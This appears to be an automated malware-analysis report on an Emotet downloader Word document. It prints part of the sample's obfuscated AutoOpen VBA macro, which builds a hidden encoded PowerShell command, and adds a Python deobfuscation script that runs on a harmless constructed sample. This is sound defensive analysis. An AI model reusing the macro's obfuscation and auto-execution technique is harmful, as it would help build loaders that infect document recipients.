Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample carries a VBA project whose AutoOpen procedure runs as soon as the document is opened with macros enabled, the standard entry point for Emotet maldocs. The recovered source assembles a command line out of dozens of short string fragments interleaved with junk arithmetic and cmd.exe caret (^) escape characters; with the carets removed, the fragments visible in the preview read `cmd /v /r` followed by a quoted `Set RME=powe}she{{ -e ...` string and Base64-like text, i.e. a `powershell -e` (encoded command) invocation in which several characters are still placeholders. The `/v` switch enables delayed environment-variable expansion, the mechanism a loader of this type uses to substitute those placeholders before running the variable's contents; the end of the macro is not shown in the preview, so the exact substitution and the decoded PowerShell payload cannot be confirmed from this page. The command is likely intended to download and run a second-stage payload, and the ClamAV signature identifies the file as an Emotet downloader document.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6665583-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6665583-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so read this finding as the legacy marker being present alongside the VBA project rather than instead of it.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into any document containing drawing objects; it is not a payload or command-and-control host.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 47843 bytes | 2683ea7b7f57a04bee3dbf536cd3e19dd03bf86d356cfb3f6c86bca3060f9c40 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "hRUqcQoBkNYFNI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "kRVAHCArdmdTno"
Function cRPBonHMM()
On Error Resume Next
IsArray 50799 - mtwwZ / 82836 - YiDMim
IsArray CDbl(biMHIl)
OQRfGp = "md " + "/v^ ^" + " /r" + " " + CStr(Chr(jMdnvXoNo + WEwvHvC + 34 + skLtFpoJzPwMZX + RVwHoPNBHw)) + " " + "Se" + "t^" + " ^ ^ R"
VarType 95611 * jCXKlB - HjSDZ / ucjQI
HOzldP = Second(9724)
HOzldP = Oct(716)
PdwcNJ = "M^E=^" + "p^ow" + "^e}^s" + "h^e^{^" + "{^ -^e"
HOzldP = SXDQH * SXzwU
HOzldP = CCur(aNzCJb / WsBhS)
IsArray CDate(9)
FfZCkEl = " ^JA^BR" + "A^" + "H^o" + "^A^SQ^A" + "^9^" + "A#4A" + "^ZQ^B3A" + "^\^0" + "^"
VarType 12881 - AKhjEm + kvpQvG * jEnICL
HOzldP = bmaBNs / SvKMT
HOzldP = CCur(756)
HOzldP = wwaWVw * szQVzJ * 16884 + VbPRO
VarType Second(4)
PiFzmuJMl = "AbwB" + "^i^" + "A^" + "#^oA^" + "ZQ^B^" + "jA"
HOzldP = 30936 - mTwTi
IsArray Round(9)
VarType Tan(84060868)
RWRClCL = "^H" + "Q" + "A," + "A^B^OA#" + "U^A^" + "dAA" + "^u^A" + "^" + "$c^AZ" + "^Q" + "^BiA" + "E^:^Ab^"
HOzldP = CDate(nawAZF * UowUk)
IsArray Int(wiSLc)
HOzldP = 98772 * nOWSp + sBlTo - asjVO
VarType 29837 / VfPtXn + 99698 - SXzmVB
VarType Tan(CfupS)
IsArray CByte(55002 / VKkqZS)
pwJinLfMtw = "A^" + "B^p" + "^A" + "^#" + "^U^" + "Ab^" + "gB^0" + "^A" + ".^s"
VarType 6341 + CrJdJV
HOzldP = nHwcv + TCjNU
IsArray CDate(aDwzwh)
jJjMiEznhin = "^A" + "JAB^" + "%" + "A" + "$^,Ac^" + "wA^9A" + "\cA^aA" + "^" + "B0^" + "A"
cRPBonHMM = OQRfGp + PdwcNJ + FfZCkEl + PiFzmuJMl + RWRClCL + pwJinLfMtw + jJjMiEznhin
IsArray Second(268)
VarType CBool(8)
HOzldP = 40593 - SKQOpd
HOzldP = Rnd(DSOtXk + WtQjMv)
End Function
Function CliTiw()
On Error Resume Next
IsArray 45574 * uvBbA - Juiin * UvlFM
VarType FarKt * 419 - zbrojK - wqsiGv
HOzldP = CDate(XLOnBr)
JnDGwjYwkl = "^" + "HQAc^" + "A" + "^A^6^A" + "^\+^A" + "^L" + "^w^B^o" + "^A#" + "EA^" + "@g^B" + "h"
VarType 46557 / sLzuj / AkcsD / nXuEq
VarType Str(35643 + 65442)
HOzldP = Round(XkbrAC)
HOzldP = Tan(19778 * YdilO)
sEqdVAzIO = "^AH,^A" + "^a^QB7" + "^A^#^+A" + "^d^A" + "Bv^A^." + "^," + "A^%^AA^" + "u^" + "A#:A^bw" + "^B7A^\^" + "+" + "^A^T"
HOzldP = TypeName(33664 - rDGSi - DUkCEU / 88675)
VarType Rnd(99647 - ADRJE - 23761 / HjrVU)
IsArray CByte(PjOjIM)
ZwsLCwnXrA = "^gBoAE^" + "A^A^a^A" + "^B^0^" + "A^" + "HQ^AcAA" + "^6^A^" + "\+A^L" + "w^B^m"
IsArray mUami * XGrnD + lDJGO / 7536
GQOkzBUi = "^" + "A#^" + "U" + "Ab^" + "g^B" + "^{" + "A^H^" + "QA^d^" + "A" + "Ay^A." + "A" + "A:"
IsArray Oct(KtPXwz)
IsArray LCase(5888 - VsUMtn * 74536 - RddwaW)
rSOjbjv = "QA^4^" + "A\" + "4A@" + "^w^BvA" + "#^"
VarType CByte(EXkGQ - tWbbK)
HOzldP = Rnd(XEqisv)
VarType CDbl(SMcahD)
HOzldP = CVar(ZjDCRL * ZJVTZm - pikXOM + sQSiFb)
YjjlhpG = "0A^L" + "^" + "w^B^" + "k^AE+A" + "^@^g^B" + "nA^" + "Hg"
VarType CDate(dpEnqD)
IsArray Tan(DhSlU)
KiBPjlXQVz = "A" + "^" + "Q" + "ABoA^H" + "^" + "Q" + "^A^d^A" + "B^w^A" + ".oALw" + "^Av^A#^" + "U" + "A^@Q" + "B^zA^"
IsArray jqJrw - XvpMT + hozPB / blWCc
VarType CDate(iWbHD + 83163 * ZIFsa / YSJzik)
VarType Rnd(685)
dTkhE = "HQAZ" + "^Q" + "^B^uA" + "^#^Q^" + "AL^" + "g^"
IsArray Sin(282)
HOzldP = CkTlwi / OAKZbB * hIcRH + rXbRCT
cYHhj = "B^q" + "A^HA^A" + "^LwB^\A" + "#^wA^%" + "^Q^B}" + "AE^@A" + "^QQB^AA" + "^#^g^Ad" + "^AB^" + "0AHA^" + "A^" + "O^g^Av" + "^A"
VarType YIDPmY - kFIra
VarType PJzRpP + 41332 + GMhsf / CiiUd
LOfHzEJ = "^" + "\+A^@^" + "gB^" + "{^" + "A" + "#0^A^" + "bg^B5" + "^A^#^:A" + "Lg^Bj^" + "A#^+" + "^Ab^Q"
VarType CDate(981)
qJivjOzdCSz = "AvA^HU" + "AO" + "^AB^$A$" + "^" + ",^A^aQ" + "^B" + "KA^"
CliTiw = JnDGwjYwkl + sEqdVAzIO + ZwsLCwnXrA + GQOkzBUi + rSOjbjv + YjjlhpG + KiBPjlXQVz + dTkhE + cYHhj + LOfHzEJ + qJivjOzdCSz
HO
... (truncated)
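The preview above shows the loader's whole trick: every fragment of the command is a short string literal, `CStr(Chr(... + 34 + ...))` supplies the double quote (undeclared VBA variables evaluate to 0, so only the literal 34 counts), junk arithmetic on undefined names is silently ignored under `On Error Resume Next`, and cmd.exe caret escapes break up every keyword. The script below is an added example written for this report, not the analyzer's or the page's own code: it replays such assignments in source order, strips the carets the way cmd.exe does, and decodes a `powershell -e` argument. Its `MACRO` is a constructed sample in the same style with a harmless payload; it does not reproduce the placeholder substitution that the truncated part of the real macro performs, and all function and variable names are this example's own.

```python
"""Rebuild the cmd/PowerShell command assembled by an Emotet-style
string-concatenation macro and decode its Base64 '-e' argument.

Added example for this report, not the analyzer's own code. MACRO is a
constructed stand-in in the style of the extracted macros.bas; it is not
the page's sample and its payload is harmless.
"""
import base64
import re

# Constructed payload: the real argument is not recoverable from the preview.
PLAINTEXT = "Write-Output 'constructed harmless payload'"
ENC = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode()

def caretize(s, every=3):
    """Obfuscator side: insert a cmd.exe escape caret after every `every` chars."""
    return "".join(c + ("^" if i % every == every - 1 else "") for i, c in enumerate(s))

def to_fragments(s, size=4):
    """Obfuscator side: split s into VBA string literals joined with '+'."""
    return " + ".join('"%s"' % s[i:i + size] for i in range(0, len(s), size))

MACRO = f'''Attribute VB_Name = "kRVAHCArdmdTno"
Function cRPBonHMM()
On Error Resume Next
IsArray 50799 - mtwwZ / 82836 - YiDMim
OQRfGp = "c" + "md " + "/v^ ^" + " /r" + " " + CStr(Chr(jMdnvXoNo + WEwvHvC + 34 + RVwHoPNBHw)) + " " + "Se" + "t^" + " ^ ^ R"
HOzldP = Oct(716)
PdwcNJ = "M^E=^" + "p^ow" + "^e^r^s" + "h^e^l^" + "l^ -^e "
cRPBonHMM = OQRfGp + PdwcNJ
End Function
Function CliTiw()
VarType Tan(84060868)
FfZCkEl = {to_fragments(caretize(ENC))}
Closer = " ^&^& c^all !R^ME!" + CStr(Chr(34))
CliTiw = FfZCkEl + Closer
End Function
Sub AutoOpen()
FinalCmd = cRPBonHMM + CliTiw
Shell FinalCmd, 0
End Sub
'''

STR_RE = re.compile(r'"((?:[^"]|"")*)"')
CHR_RE = re.compile(r"^(?:CStr\()?Chr\(([^()]*)\)\)?$", re.I)
# One '+' operand: a string literal, a Chr(...) call (kept whole even though it
# contains '+'), or anything else up to the next '+' (junk arithmetic, a name).
TERM_RE = re.compile(r'\s*("(?:[^"]|"")*"|(?:CStr\()?Chr\([^()]*\)\)?|[^+\s][^+]*)')
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
ENC_RE = re.compile(r"\s-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]+)", re.I)

def split_plus(expr):
    """Tokenize a '+' expression into its operands."""
    return [t.strip() for t in TERM_RE.findall(expr)]

def eval_term(term, env):
    """Evaluate one operand: string literal, Chr(...) or an already-built string."""
    m = STR_RE.fullmatch(term)
    if m:
        return m.group(1).replace('""', '"')
    m = CHR_RE.match(term)
    if m:
        # Undeclared VBA variables are Empty (0) under On Error Resume Next, so
        # Chr(junkA + 34 + junkB) is Chr(34): only the integer literals count.
        n = sum(-int(t) if s == "-" else int(t)
                for s, t in re.findall(r"([+-]?)\s*(\w+)", m.group(1)) if t.isdigit())
        return chr(n) if 0 <= n < 256 else ""
    return env.get(term, "")  # junk arithmetic / unknown names contribute nothing

def reconstruct(macro):
    """Replay every assignment in source order; returns {variable: built string}."""
    env = {}
    for line in macro.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = "".join(eval_term(t, env) for t in split_plus(m.group(2)))
    return env

def strip_carets(s):
    """cmd.exe escaping after the /r argument's outer quotes are removed:
    '^' makes the next character literal, so '^^' becomes '^'."""
    return re.sub(r"\^(.)", r"\1", s)

def decode_encoded_command(cmd):
    """Decode the UTF-16LE Base64 argument of powershell -e/-enc, or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    b64 = m.group(1)
    try:
        return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le")
    except ValueError:  # not valid Base64/UTF-16LE yet, e.g. placeholders unsubstituted
        return None

def analyze(macro):
    """The longest built string is the assembled command; normalize and decode it."""
    raw = max(reconstruct(macro).values(), key=len, default="")
    cmd = strip_carets(raw)
    return {"raw": raw, "command": cmd, "decoded": decode_encoded_command(cmd)}

if __name__ == "__main__":
    print(analyze(MACRO))
```

To try it on the real artifact, call `analyze(open("macros.bas").read())`. For this sample expect `decoded` to be `None`: the characters `}`, `{`, `#`, `\` and similar that appear inside the otherwise Base64-looking fragments are placeholders, and the part of the command that swaps them back (delayed expansion, `!VAR:x=y!`, is the usual cmd.exe mechanism, which is why `/v` is present) lies in the truncated remainder. The `command` value still exposes the `cmd /v /r " Set RME=...` structure, which is the evidence worth recording even without the decoded payload.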